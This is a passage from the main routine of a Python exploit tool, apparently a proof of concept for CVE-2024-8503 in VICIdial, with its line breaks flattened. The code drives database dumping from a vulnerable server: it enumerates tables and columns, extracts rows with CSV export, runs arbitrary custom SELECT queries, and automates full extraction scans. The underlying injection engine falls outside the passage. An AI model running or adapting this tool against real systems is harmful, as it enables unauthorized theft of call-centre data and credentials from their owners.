OutputFormatter.print_table_list(tables) if args.get_columns: columns = scanner.get_table_columns(args.get_columns, args.column_limit) if columns: scan_state.update_table_columns(args.get_columns, columns) OutputFormatter.print_columns_list(args.get_columns, columns) if args.table and args.columns: columns = [c.strip() for c in args.columns.split(',')] data = scanner.extract_table_data(args.table, columns, args.rows) OutputFormatter.print_table_data(args.table, columns, data) if args.export: OutputFormatter.export_csv(columns, data, args.export) if args.auto_extract: columns, data = scanner.auto_extract_table(args.auto_extract) if columns and data: scan_state.update_table_columns(args.auto_extract, columns) OutputFormatter.print_table_data(args.auto_extract, columns, data) if args.export: OutputFormatter.export_csv(columns, data, args.export) if args.custom_query: query = args.custom_query if args.custom_query.startswith('SELECT') else f"SELECT {args.custom_query}" print(f"\n[+] Executing: {query}") sys.stdout.write("[+] Result: ") sys.stdout.flush() try: result = scanner.engine.extract_string(query) print(f"\n[+] {repr(result)}") except Exception as e: print(f"\n[-] Error: {e}") if args.full_scan: interactive = InteractiveMode(scanner, scan_state) interactive.full_scan() duration = time.time() - start_time print("\n[+] Scan complete!") print(f"[+] Total time: {duration/60:.1f} minutes") print("[+] Remember: All operations were READ-ONLY") print("[+] CVE-2024-8503 - CRITICAL Severity\n") send_notification("VICIdial PoC", f"Scan completed in {duration/60:.1f} minutes") play_completion_sound() if __name__ == '__main__': try: main() except KeyboardInterrupt: print("\n\n[!] Interrupted by user. Exiting...") sys.exit(0) except Exception as e: print(f"\n[-] Unexpected error: {e}") sys.exit(1)